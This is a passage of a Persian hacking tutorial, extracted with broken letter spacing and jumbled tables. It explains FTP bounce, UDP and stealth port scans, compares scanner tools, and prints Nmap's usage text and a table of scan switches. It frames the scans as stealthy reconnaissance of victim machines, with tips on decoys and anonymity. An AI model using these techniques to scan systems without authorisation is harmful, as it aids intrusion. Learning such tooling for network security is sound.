ﻢ اﻧﺠ ﺎم ﻧﻤ ﯽ ﺷ ﻮد ﻣﮕ ﺮ ﺏ ﺎ اﺱ ﺘﻔﺎدﻩ از ﻗﺎﺏﻠﻴﺘﻬ ﺎی ‪ !! FTP‬در ﺱ ﻮیﺲ ‪ FTP‬ی ﮏ ﺱ ﺮی‬ ‫ﻗﺎﺏﻠﻴﺖ هﺎیﯽ اﺱﺖ ﮐﻪ ﺏﻪ ﺷﻤﺎ اﻣﮑﺎن ﻣﻴﺪهﺪ ﻣﺜﻼ ﺏﻪ ﺟﺎی ایﻨﮑ ﻪ از ی ﮏ ﺱ ﺮور ﻣ ﺴﺘﻘﻴﻤﺎ ﻓ ﺎیﻠﯽ دریﺎﻓ ﺖ ﮐﻨﻴ ﺪ ﺁن را ﺏ ﺮای ی ﮏ ﺱ ﺮور دیﮕ ﺮ ﺏﻔﺮﺱ ﺘﻴﺪ‬ ‫ﺧﻮب ایﻦ ﮐﺎر را ﺏﺮای ایﻦ اﻧﺠﺎم ﻣﻴﺪهﻨﺪ ﮐﻪ ایﻦ دو ﭼﻮن ﺱﺮﻋﺖ ایﻨﺘﺮﻧﺖ زیﺎدی دارﻧﺪ ﻓﻴﻞ زود ﺕﺮ ﺏﺎرﮔﻴﺮی ﻣﻴﺸﻮد و ﺏﻌﺪ ﺷﻤﺎ ﭘ ﻴﺶ ﺱ ﺮور دوﻣ ﯽ‬ ‫رﻓﺘﻪ و ﻓﺎیﻞ ﺧﻮد را روی ‪ CD‬ﻣﻴﺮیﺰیﺪ و ﺏﻘﻴﻪ ﻣﺎﺟﺮا ‪.‬ایﻨﻪ ﻣﮑﺎﻧﻴﺰم از ایﻦ اﺻﻞ اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﺪ‪.‬‬ ‫در ایﻦ ﻣﮑﺎﻧﻴﺰم ﻧﺮم اﻓﺰار ﭘﻮیﺶ ﮔﺮ ﭘﻮرت یﮏ ارﺕﺒﺎط ‪ TCP‬ﺏﺎ ﺱﺮویﺲ دهﻨﺪﻩ ‪ ) FTP‬ایﻦ را هﻤﻴﻦ ﺟﺎ ﺏﮕﻮیﻢ ﺷﻤﺎ ﺏﺎیﺪ روی ﻣﺎﺷﻴﻦ هﺪف ﺏﺪاﻧﻴ ﺪ‬ ‫ایﻦ ﺱﺮویﺲ ﻓﻌﺎل ﭘﻮرت ‪ ٢١‬ﺏﺎز و یﺎ ‪ ...‬ﺕﺎ ایﻦ ﺷﻴﻮﻩ ﺏﻪ درﺱﺘﯽ ﮐ ﺎر ﮐﻨ ﺪ ( ﺏﺮﻗ ﺮار ﮐ ﺮدﻩ و از ﺁن ﻣﺎﺷ ﻴﻦ ﻣﻴﺨﻮاه ﺪ ﺏ ﺎ ی ﮏ ﭘ ﻮرت ﻣ ﺸﺨﺺ روی‬ ‫ﻣﺎﺷﻴﻦ هﺪف ارﺕﺒﺎط ﺏﺮﻗﺮار ﮐﻨﺪ ) ایﻦ ﺱﺮویﺲ دهﻨﺪﻩ هﻢ ﻣﯽ ﺕﻮاﻧﺪ روی ﻣﺎﺷﻴﻦ ﭘﻮیﺸﮕﺮ ﭘﻮرت ﺏﺎﺷﺪ هﻢ ﻣﻴﺘﻮاﻧﺪ در یﮏ ﺟ ﺎی دیﮕ ﺮ از ﺷ ﺒﮑﻪ ﺏﺎﺷ ﺪ‬ ‫( ﺧﻮب اﮔﺮ ارﺕﺒﺎط ﺏﺮﻗﺮار ﻧ ﺸﻮد و ﺱ ﺮویﺲ دهﻨ ﺪﻩ ‪ FTP‬ﺏ ﻪ ﻧﺮﻣ ﺎﻓﺰار ﭘ ﻮیﺶ ﮔ ﺮ ﭘ ﻮرت اﻃ ﻼع ﻣﻴﺪه ﺪ ﭘ ﻮرت ﺏ ﺴﺘﻪ اﺱ ﺖ ‪ .‬ﭘ ﺲ ﺁن ﭘ ﻮرت روی‬ ‫ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ ﺏﺴﺘﻪ اﺱﺖ‪ .‬اﻣﺎ اﮔﺮ ﭘﻮرت ﻣﺮﺏﻮﻃﻪ ﺏﺎز ﺏﺎﺷﺪ ‪ ،‬درﺁن ﻣﻮﻗﻊ هﻤﻴﺸﻪ یﮏ ﭘﺎﺱﺦ ﺏﺎ ایﻦ ﻣﻀﻤﻮم ﮐﻪ ﭘﻮرت ﺏﺎز اﺱﺖ اﻣﺎ اﻣﮑﺎن ﺕﺒﺎدل ﻓﺎیﻞ‬ ‫وﺟﺪ ﻧﺪارد دادﻩ ﻣﻴﺸﻮد‪ .‬ﺧﻮب ﺏﺎز هﻢ ﺏﺎ دریﺎﻓﺖ ایﻦ ﻓﺎیﻞ ﭘﻮی ﺸﮕﺮ ﻣﻴﻔﻬﻤ ﺪ ﮐ ﻪ ﭘ ﻮرت ﺏ ﺎز اﺱ ﺖ ‪.‬ای ﻦ روش ‪ ،‬روش ﮐ ﺎﻣﻼ ﻣﺨﻔﻴﺎﻧ ﻪ ای اﺱ ﺖ ﭼ ﻮن‬ ‫ﻣﺎﺷﻴﻦ هﺪف ﺏﺎ یﮏ ﻣﺎﺷﻴﻦ ﺙﺎﻟﺚ ارﺕﺒﺎط ﺏﺮﻗﺮار ﻣﯽ ﮐﻨﺪ ﻧﻪ ﺏﺎ ﻣﺎ‪.‬‬ ‫در ایﻦ روش هﻤﻴﺸﻪ ﺱﻌﯽ ﮐﻨﻴﺪ از ﺱﺮویﺲ دهﻨﺪﻩ هﺎی ‪ FTP‬وﻃﻨﯽ " هﻤﻴﺸﻪ " اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﭼﻮن ﻣﺎ از ﻗﺎﺏﻠﻴﺖ ای ﺏﻪ ﻧﺎم ‪:‬‬ ‫‪ File-Forwarding‬اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﻴﻢ و در اﮐﺜﺮ اوﻗﺎت ایﻦ ﻗﺎﺏﻠﻴﺖ روی ﺱ ﺮورهﺎی وﻃﻨ ﯽ ﺏ ﻪ ﻋﻠ ﺖ ﻋ ﺪم داﻧ ﺶ ﮐ ﺎﻓﯽ ﻓﻌ ﺎل اﺱ ﺖ اﻣ ﺎ در ﺏ ﻴﺶ از‬ ‫‪ %٩٠‬اوﻗﺎت روی ﺱﺮورهﺎی اروﭘﺎیﯽ و ﮐﺎﻧﺎدایﯽ و ﺁﻣﺮیﮑﺎیﯽ )ﺷﻴﻄﺎن ﺏﺰرگ!!!!! ﻧﻪ ﻣﮑﺰیﮏ و ﺏﺮزیﻞ و‪ (...‬ﺏﻠﻮک ﺷﺪﻩ اﺱﺖ‪.‬‬ ‫‪ -۶‬ﭘﻮیﺶ ﭘﻮرت هﺎی ‪: udp‬‬ ‫ﮐﻼ ﭘﺮوﺕﮑﻞ ‪ udp‬را ﺏﺪون اﺕﺼﺎل ﻣﯽ ﮔﻮیﻨﺪ یﻌﻨﯽ ﺷﻤﺎ هﻴﭻ ﮐﻨﺘﺮل و‪ ...‬روی ﺏﺴﺘﻪ ﮐﻪ ﺡﻮاﻟﻪ ﻣﻴﮑﻨﻴﺪ ﺏﺮﺧﻼف ‪ tcp‬ﻧﺪاریﺪ و ﺷﺎیﺪ ایﻦ ﺏ ﺴﺘﻪ در ی ﮏ‬ ‫ﺧﺮاﺏﻪ ایﯽ ‪ ،‬ﮔﻮر ﺏﻪ ﮔﻮر ﺷﻮد و یﺎ ﺷﺎیﺪ ﺕﺮﺕﻴﺐ دریﺎﻓﺖ ﺁﻧﻬﺎ ﺏﻪ هﻢ ﺏﺨﻮرد و‪...‬‬ ‫ایﻦ ﭘﺮوﺕﮑﻞ ﭼﻮن ﺧﻴﻠﯽ ﺱﺎدﻩ اﺱﺖ ﭘﺲ اﻣﮑﺎن اﺟﺮای ﺷﻴﻮﻩ و ﻣﺘﺪهﺎی ﮐﻤﯽ را ﻣﻴﺪهﺪ ﺏﻪ ﻣﺎ یﮑﯽ از ایﻦ ﺷﻴﻮﻩ هﺎ ایﻦ اﺱﺖ ﮐﻪ یﮏ ﺏ ﺴﺘﻪ ‪ udp‬ﺏ ﺮای‬ ‫هﺪف ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد اﮔﺮ ﭘﺎﺱﺦ ‪ ICMP Port Unreachable‬دریﺎﻓﺖ ﺷﻮد ﭘﺲ ﺏ ﻪ ﻃ ﻮر یﻘ ﻴﻦ ‪ %١٠٠٠٠٠‬ﻣﻴ ﺸﻮد ﮔﻔ ﺖ ﭘ ﻮرت ﺏ ﺴﺘﻪ اﺱ ﺖ در‬ ‫ﻏﻴﺮ ایﻦ ﺻﻮرت ﻣﻴﺸﻮد ﻓﺮض ﮐﺮد ﭘﻮرت ﺏﺎز اﺱﺖ اﻟﺒﺘﻪ زیﺎد ﺟﺪی ﻧﻤﻴﺸﻮد ﮔﺮﻓﺖ ایﻦ را ﭼ ﻮن ﺷ ﺎیﺪ ﺏ ﺴﺘﻪ ﻧﺮﺱ ﻴﺪﻩ ﺏﺎﺷ ﺪ و ی ﺎ ‪ TTL‬ﺁن ﺕﻤ ﺎم ﺷ ﺪﻩ‬ ‫ﺏﺎﺷﺪ و‪...‬‬ ‫هﻤﺎﻧﻄﻮر ﮐﻪ در ایﻦ ‪ ۶‬ﻣﮑﺎﻧﻴﺰم ﺏﻪ ﺷﻤﺎ ﺁﻣﻮزش دادم ﻧﻤﻴﺸﻮد ﮔﻔﺖ ﮐﻪ ﮐﺪام ﻣﮑﺎﻧﻴﺰم ﺏﻬﺘﺮ اﺱﺖ و ﺷﻤﺎ ﺏﺎیﺪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺷﺮایﻂ ﺧﻮد ﮐﻪ در ﻣﺮﺡﻠﻪ ﻗﺒﻞ‬ ‫ﭘﻴﺪا ﮐﺮدﻩ ایﺪ ﺕﺼﻤﻴﻢ ﺏﮕﻴﺮیﺪ ﮐﻪ ﺏﺎیﺪ از ﮐﺪام ﻣﮑﺎﻧﻴﺰم اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ‪ .‬ﻣﺜﻼ ﺏﺮای ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ﻟﻴﻨﻮﮐﺲ و هﻢ ﺧﺎﻧﻮادﻩ هﺎی ﺁن ﮔﺰیﻨﻪ ﻧﻘﺾ اﺻ ﻮل‬ ‫ﭘﺮوﺕﮑﻞ ﺏﺪ ﻧﻴﺴﺖ ) ایﻦ یﺎدم رﻓﺘﻪ ﺏﮕﻢ ﻣﻦ ﻓﮑﺮ ﻣﻴﮑﻨﻢ روی ﻧﺴﺦ ﺟﺪیﺪ ایﻦ ﻧﻮع ﺱﻴﺴﺘﻤﻬﺎ ایﻦ ﻣﺸﮑﻞ ﺏﺮﻃﺮف ﺷﺪﻩ (‬ ‫و یﺎ اﮔﺮ از ﻓﻴﻠﺘ ﺮ ﺷ ﺪن ﺏ ﺴﺘﻪ ه ﺎ ﮐﻼﻓ ﻪ ﺷ ﺪﻩ ای ﺪ ﻣﮑ ﺎﻧﻴﺰم ‪ TCP ACK Scan‬ﮔﺰیﻨ ﻪ ﺧ ﻮﺏﯽ اﺱ ﺖ‪ .‬اﮔ ﺮ ﻧﺎﺷ ﻨﺎس ﻣﺎﻧ ﺪن ﺡﮑ ﻢ ﻣ ﺮگ زﻧ ﺪﮔﯽ دارد‬ ‫اﺱﺘﻔﺎدﻩ از ﻣﮑﺎﻧﻴﺰم ‪ FTP bounce Scan‬و اﺱﺘﻔﺎدﻩ از یﮏ ﭘﺮو ﮐﺴﯽ ﮐﻪ ﺧﻮدﺕﺎن ﭘﻴﮑﺮ ﺏﻨﺪی ﮐﺮدﻩ ﺏﺎﺷﻴﺪ ﺁن را ﺕﻪ اﻣﻨﻴﺖ را ﺏﺮای ﺷﻤﺎ ﺏ ﻪ ارﻣﻐ ﺎن‬ ‫ﻣﯽ ﺁورد ‪ .‬اﮔﺮ در داﺧﻞ یﮏ ﺷﺒﮑﻪ داﺧﻠ ﯽ ه ﺴﺘﻴﺪ ﻣﮑ ﺎﻧﻴﺰم ‪ Polite Scan‬ﺟ ﻮاب ه ﺎی ‪ %١٠٠‬درﺱ ﺖ و ﻗﺎﺏ ﻞ اﻃﻤﻴﻨ ﺎﻧﯽ را ﺏ ﻪ ﻣ ﺎ ﻣ ﯽ ده ﺪ‪ .‬اﮔ ﺮ‬ ‫ﻣﺸﮑﻞ ﮐﻨﺪی دﺱﺖ رﺱﯽ ﺏﻪ ﺷﺒﮑﻪ و ﻧﮕﺮاﻧﯽ ﺷﻨﺎﺱﺎیﯽ داریﺪ ﮔﺰیﻨﻪ ‪ TCP SYN Scan‬اﻧﺘﺨﺎب ﻓﻮق اﻟﻌﺎدﻩ ایﯽ اﺱﺖ‪.‬‬ ‫ﻗﺒﻞ از هﺮ ﭼﻴﺰ یﮏ ﻣﻘﺎیﺴﻪ ﮐﻮﭼﻮﻟﻮ ﺏﻴﻦ ﻧﺮم اﻓﺰارهﺎی ﭘﻮیﺸﮕﺮ ﭘﻮرت ﻣﻌﺮوف اﻧﺠﺎم ﻣﻴﺪهﻢ ﺕﺎ ﺏﻌﺪ ﺏﺮﺱﯽ ﺏﻪ ﻣﻌﺮﻓﯽ ﺁﻧﻬﺎ‪:‬‬ ‫ﺕﻮاﻧﺎیﯽ ﭘﻮیﺶ ﭘﻮرت هﺎی ‪TCP‬‬

‫ﺕﻮاﻧﺎیﯽ ﭘﻮیﺶ ﭘﻮرت هﺎی ‪UDP‬‬

‫دارا ﺏﻮدن ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ‬ ‫ﻣﺨﻔﻴﺎﻧﻪ‬

‫‪Җ‬‬ ‫‪Җ‬‬ ‫‬‫‪Җ‬‬ ‫‪Җ‬‬

‫‪-‬‬

‫‬‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫‬‫‬‫‬‫‪Җ‬‬ ‫‪-‬‬

‫‪Җ‬‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫‪-‬‬

‫ﻧﺎم ﻧﺮم اﻓﺰار ﭘﻮیﺶ ﮔﺮ‬ ‫ﺏﺮای ﺱﻴﺴﺘﻢ ﻋﻤﻞ هﺎی‬ ‫‪UNIX‬‬ ‫‪Strobe‬‬ ‫‪Tcp_Scan‬‬ ‫‪Udp_Scan‬‬ ‫‪Nmap‬‬ ‫‪Netcat‬‬ ‫ﺏﺮای ﺱﻴﺴﺘﻢ ﻋﻤﻞ هﺎی‬ ‫‪Windows‬‬ ‫‪NMapWin‬‬ ‫‪Net Scan Tools Pro‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‬‫‪Җ‬‬

‫‬‫‬‫‬‫‬‫‬‫‪-‬‬

‫‬‫‬‫‬‫‬‫‪Җ‬‬ ‫‪Җ‬‬

‫ﺻﻔﺤﻪ‬

‫‪٢٩‬‬

‫‪200x‬‬ ‫‪Super Scan‬‬ ‫‪NTO Scanner‬‬ ‫‪Win Scan‬‬ ‫‪Ip Eye‬‬ ‫‪WUPS‬‬ ‫‪Fscan‬‬

‫ﺧﻮب ﺡﺎل ﺏﻪ ﻣﻌﺮﻓﯽ ﮐﺎرا ﺕﺮیﻦ ﻧﺮم اﻓﺰارهﺎی ﭘﻮیﺸﮕﺮ ﭘﻮرت و اﻟﺒﺘﻪ ﮐﺎﻣﻞ ﺕﺮیﻦ ﻣﯽ ﭘﺮدازم‪:‬‬ ‫‪: Nmap -١‬‬ ‫هﻴﭻ ﺟﺎی ﺏﺤﺜﯽ ﻧﻴﺴﺖ ﮐﻪ ایﻦ اوﻟﯽ اﺱﺖ ) ﺕﺎ ﺏﻪ ﺡﺎل (‪ .‬ﺕﻤﺎم ‪ ۶‬ﻣﮑﺎﻧﻴﺰم ﺏﺎﻻ را ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﯽ ﮐﻨﺪ اﻟﺒﺘﻪ ﺏﺎ دﻗﺖ ﺏﺎﻻ ‪.‬‬ ‫ﺏﺮای دریﺎﻓﺖ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺁدرس زیﺮ ﻣﺮاﺟﻌﻪ ﮐﻨﻴﺪ ‪:‬‬ ‫‪www.insecure.org/nmap‬‬ ‫ﺧﻮب ایﻦ هﻢ ﻣﺜﻞ ﺏﻘﻴﻪ اﺏﺰارهﺎ و روال هﻤﻴﺸﮕﯽ اول ﺏﺮای ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ﮐﺪ ﺏﺎز ﻧﻮﺷﺘﻪ ﺷﺪ ﺏﻌﺪ ﻧﻤﻮﻧﻪ ویﻨ ﺪوز ﺁن ه ﻢ ﺁﻣ ﺪ ﮐ ﻪ ﺧ ﺎﻟﯽ از اﺷ ﮑﺎل‬ ‫هﻢ ﻧﻴﺴﺖ ) روی ‪ xp‬هﺎی ﺱﺮویﺲ ﭘﮏ ‪ ١‬و ‪ ٢‬اﺟﺮا ﻧﻤﯽ ﺷﻮد ﺏﺎیﺪ ﺡﺘﻤﺎ ﺏ ﺪون ﺱ ﺮویﺲ ﭘ ﮏ ﺏﺎﺷ ﺪ ویﻨ ﺪوز ‪ Xp‬ی ﺎ روی ‪ NT‬ه ﺎ اﺟ ﺮا ﮐﻨﻴ ﺪ ﺁن را‬ ‫ﻣﺜﻼ ویﻨﺪوز ‪ ، ٢٠٠٠‬روی ‪ ME‬و ‪ ٩٨‬هﻢ اﺟﺮا ﻧﻤﯽ ﺷﻮد اﻟﺒﺘﻪ هﻨﻮز وﻗ ﺖ ﻧﮑ ﺮدم روی ‪ Advance SERVER 2003‬اﻣﺘﺤ ﺎن ﮐ ﻨﻢ ﺏﺒﻴ ﻨﻢ ﭼ ﻪ‬ ‫ﻣﻴﺸﻮد ﺟﻮاب ( ﺧﻮب ﻧﺴﺨﻪ ویﻨﺪوز ﺁن ورژن ‪ ١٫٣٫١‬ﺁﺧﺮیﻦ ﺁن هﺴﺖ ﮐﻪ ایﻦ ﺷﮑﻠﯽ ‪:‬‬

‫ایﻦ ﻓﺮاﻣﻮش ﮐﺮدم ﮐﻪ ﺏﮕﻮیﻢ ﺡﺘﻤﺎ ﻧﺮم اﻓﺰار ‪ Win Pcap‬را ﺏﺎیﺪ ﻧﺼﺐ ﮐﻨﻴﺪ ﮐﻪ ﺁﺧﺮیﻦ ﻧﺴﺨﻪ ﺁن ‪ ٣‬اﺱﺖ ﺏﺮای اﺟﺮای ﻧﺴﺨﻪ ویﻨﺪوز ﺁن ‪.‬‬ ‫ﻧ ﺴﺨﻪ ویﻨ ﺪوز ﺁن دارای دو ﻣ ﺪل اﺱ ﺖ ی ﮏ ﻣ ﺪل ﺕﺤ ﺖ ﺧ ﻂ ﻓﺮﻣ ﺎن ) ﻧ ﺴﺨﻪ هﻠ ﻮ ( و دیﮕ ﺮی دارای ی ﮏ راﺏ ﻂ ﮐ ﺎرﺏﺮی ﮔﺮاﻓﻴﮑ ﯽ اﺱ ﺖ ) ﺏ ﺎ ﻧ ﺎم‬ ‫‪ .( NMapWin‬ﺏﻪ ﻧﻈﺮ ﻣﻦ ﺕﻨﻬﺎ ﻣﺰیﺖ ﻧﺴﺨﻪ ﮔﺮاﻓﻴﮑﯽ ﺁن اﺱﺖ ﮐﻪ ﭘﻴﮑﺮ ﺏﻨﺪی را ﺏﺮای ﻣﺒﺘﺪی ه ﺎ ﺱ ﺎدﻩ ﻣﻴﮑﻨ ﺪ اﻟﺒﺘ ﻪ در ﭘ ﺎیﻴﻦ ﭘﻨﺠ ﺮﻩ ﻣﻌ ﺎدل ﭘﻴﮑ ﺮ‬ ‫ﺏﻨﺪی ﻧﺴﺨﻪ ﺧﻂ ﻓﺮﻣﺎن را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ و ایﻦ ﻣﺰیﺖ اﺻﻠﯽ ﺁن اﺱﺖ !!‬ ‫ایﻦ هﻢ ‪ nmap‬در ﺧﻂ ﻓﺮﻣﺎن ﮐﻪ ایﻦ ﺷﮑﻠﯽ اﺱﺖ ‪:‬‬ ‫اول ﻣﻦ ﻣﺪل ﺧﻂ ﻓﺮﻣﺎن ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﺏﻌﺪ ﻣﺪل ﮔﺮاﻓﻴﮑﯽ ﺁن راهﻤﺮاﻩ ﺧﻂ ﻓﺮﻣﺎن ‪:‬‬ ‫‪C:\Program Files\NMapWin\bin>nmap.exe‬‬ ‫>‪Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٣٠‬‬

‫‪* -sU UDP port scan‬‬ ‫)‪-sP ping scan (Find any reachable machines‬‬ ‫)‪* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only‬‬ ‫)‪-sR/-I RPC/Identd scan (use with other scan types‬‬ ‫‪Some Common Options (none are required, most can be combined):‬‬ ‫‪* -O Use TCP/IP fingerprinting to guess remote operating system‬‬ ‫'‪-p ports to scan. Example range: '1-1024,1080,6666,31337‬‬ ‫‪-F Only scans ports listed in nmap-services‬‬ ‫‪-v Verbose. Its use is recommended. Use twice for greater effect.‬‬ ‫)‪-P0 Don't ping hosts (needed to scan www.microsoft.com and others‬‬ ‫‪* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys‬‬ ‫‪-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy‬‬ ‫]‪-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve‬‬ ‫>‪-oN/-oX/-oG Output normal/XML/grepable scan logs to Get targets from file; Use '-' for stdin‬‬ ‫‪* -S /-e <devicename> Specify source address or network interface‬‬ ‫)‪--interactive Go into interactive mode (then press h for help‬‬ ‫‪--win_help Windows-specific features‬‬ ‫'*‪Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.‬‬ ‫‪SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES‬‬

‫در ﺟ ﺪول زی ﺮ ﺕﻤ ﺎم ﻣﮑﺎﻧﻴﺰﻣﻬ ﺎی ﭘ ﻮیﺶ ﭘ ﻮرت در ) ‪ ( nmap‬و ﺱ ﻮیﭻ ه ﺎی ﺁن در ﻧ ﺮم اﻓ ﺰار ‪ Nmap‬ﺕﻮﺽ ﻴﺢ دادﻩ ﺷ ﺪﻩ اﺱ ﺖ‪ .‬اﮔ ﺮ ﻣ ﯽ ﺏﻴﻨﻴ ﺪ‬ ‫ﺕﻮﺽﻴﺤﺎت ﮐﺎﻣﻞ ﻧﻴﺴﺖ ﺏﻪ ﺏﺨﺶ " اﻧﻮاع ﺷﻴﻮﻩ هﺎی ﺟﺴﺘﺠﻮی ﭘﻮرت " ﻣﺮاﺟﻌﻪ ﮐﻨﻴﺪ‪.‬‬ ‫ویﮋﮔﯽ و ﻣﺸﺨﺼﻪ ﭘﻮرت‬ ‫‪ ١‬ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ !! ﺕﻤﺎم ﻣﺮاﺡﻞ ﭘﺎ ﺕﮑﺎﻧﯽ ﺏﺒﺨﺸﻴﺪ دﺱﺖ ﺕﮑﺎﻧﯽ اﻧﺠﺎم ﻣﯽ ﺷﻮد ‪.‬‬ ‫‪ ٢‬ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ !! دو ﻣﺮﺡﻠﻪ از ﺱﻪ ﻣﺮﺡﻠﻪ دﺱﺖ ﺕﮑﺎﻧﯽ ‪ ٣‬ﻣﺮﺡﻠﻪ ایﯽ اﻧﺠﺎم‬ ‫ﻣﻴﺸﻮد ‪.‬‬ ‫‪ ٣‬ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ‪ TCP FIN‬ارﺱﺎل ﻣﻴﺸﻮد‪ .‬اﮔﺮ ‪ RESET‬ﺏﺮﮔﺮدد ﭘﻮرت‬ ‫ﺏﺴﺘﻪ اﺱﺖ‪ ،‬در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ ‪.‬‬ ‫‪ ۴‬ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ‪ TCP‬ﺏﺎ ﺏﻴﺘﻬﺎی ﻓﻌﺎل ‪ FIN‬و ‪ URG‬و ‪ PUSH‬ارﺱﺎل‬ ‫ﻣﻴﺸﻮد‪ .‬اﮔﺮ ‪ RESET‬ﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪ ،‬در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز‬ ‫اﺱﺖ ‪.‬‬ ‫‪ ۵‬ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ارﺱﺎل ﻣﯽ ﺷﻮد ﮐﻪ در ﺁن هﻴﭻ یﮏ از ﺏﻴﺘﻬﺎی ﮐﻨﺘﺮﻟﯽ ) ﻣﺜﻞ‬ ‫‪ ACK‬و ‪ FIN‬و ‪ ( ...‬ﻓﻌﺎل ﻧﻴﺴﺖ‪ .‬اﮔﺮ ‪ RESET‬ﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪ ،‬در‬ ‫ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ ‪.‬‬ ‫‪ ۶‬ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ‪ TCP ACK‬ارﺱﺎل ﻣﯽ ﺷﻮد‪ .‬اﮔﺮ ‪ RESET‬ﺏﺮﮔﺮدد ﭘﻮرت‬ ‫ﺏﺴﺘﻪ اﺱﺖ‪ ،‬در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ ‪.‬‬ ‫‪ ٧‬ایﻦ ﻣﮑﺎﻧﻴﺰم ﻣﺸﺎﺏﻪ ‪ SYS ACK‬اﺱﺖ ﺏﺎ ایﻦ ﺕﻔﺎوت ﮐﻪ ﻓﻴﻠﺪ ‪ Window Size‬در‬ ‫ﺏﺴﺘﻪ ‪ TCP‬اﺱﺘﻔﺎدﻩ ﺷﺪﻩ اﺱﺖ‪.‬‬ ‫‪ ٨‬ﻣﮑﺎﻧﻴﺰم ﺏﺎ ﺡﺎل ‪ FTP bounce Scan‬اﺱﺘﻔﺎدﻩ ﻣﯽ ﺷﻮد‪.‬‬ ‫‪ ٩‬ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ‪ UDP‬ارﺱﺎل ﻣﻴﺸﻮد‪ .‬اﮔﺮ ‪ RESET‬یﺎ ﭘﻴﻐﺎم ‪ ICMP‬ﺏﺮﮔﺮدد‬ ‫ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪ ،‬در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ ‪.‬‬ ‫‪ ١٠‬ﻣﮑﺎﻧﻴﺰم ﮐﺸﻒ یﮏ ﻣﺎﺷﻴﻦ در ﺷﺒﮑﻪ ﺏﺎ اﺱﺘﻔﺎدﻩ از ﭘﻴﻐﺎم ‪. ICMP‬‬ ‫‪ ١١‬ﻣﮑﺎﻧﻴﺰم ﮐﺸﻒ ﺱﺮویﺲ ‪ RPC‬در ﺷﺒﮑﻪ‪ ).‬ایﻦ ﻣﮑﺎﻧﻴﺰم } ﺧﻮدش از ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ‬ ‫ﻣﻮدﺏﺎﻧﻪ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ { ﮐﻠﻴﻪ ﭘﻮرت هﺎی ﺏﺎز و ﺁﻣﺎدﻩ اﺱﺘﻔﺎدﻩ از ﺱﺮویﺲ ‪ RPC‬ﮐﻪ‬ ‫اﺻﻄﻼﺡﺎ ‪ port mapper‬را ﺏﻌﻼوﻩ اﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ ﺁﺷﮑﺎر ﻣﻴﮑﻨﺪ (‬

‫ﺱﻮیﭻ هﺎ ) در ﺧﻂ‬ ‫ﻓﺮﻣﺎن (‬ ‫‪-sT‬‬ ‫‪-sS‬‬

‫ﻧﺎم ﻣﺪل اﺱﮑﻦ ﺏﻪ‬ ‫ﻻﺕﻴﻦ‬ ‫‪TCP Connect‬‬ ‫‪TCP SYS‬‬

‫‪-sF‬‬

‫‪TCP FIN‬‬

‫‪-sX‬‬

‫‪TCP Xmas‬‬ ‫‪tree‬‬

‫‪-sN‬‬

‫‪Null‬‬

‫‪-sA‬‬

‫‪TCP ACK‬‬

‫‪-sW‬‬

‫‪Window‬‬

‫‪-b‬‬ ‫‪-sU‬‬

‫‪FTP Bounce‬‬ ‫‪UDP‬‬ ‫‪Scanning‬‬ ‫‪Ping‬‬ ‫‪RPC‬‬ ‫‪Scanning‬‬

‫‪-sP‬‬ ‫‪-sR‬‬

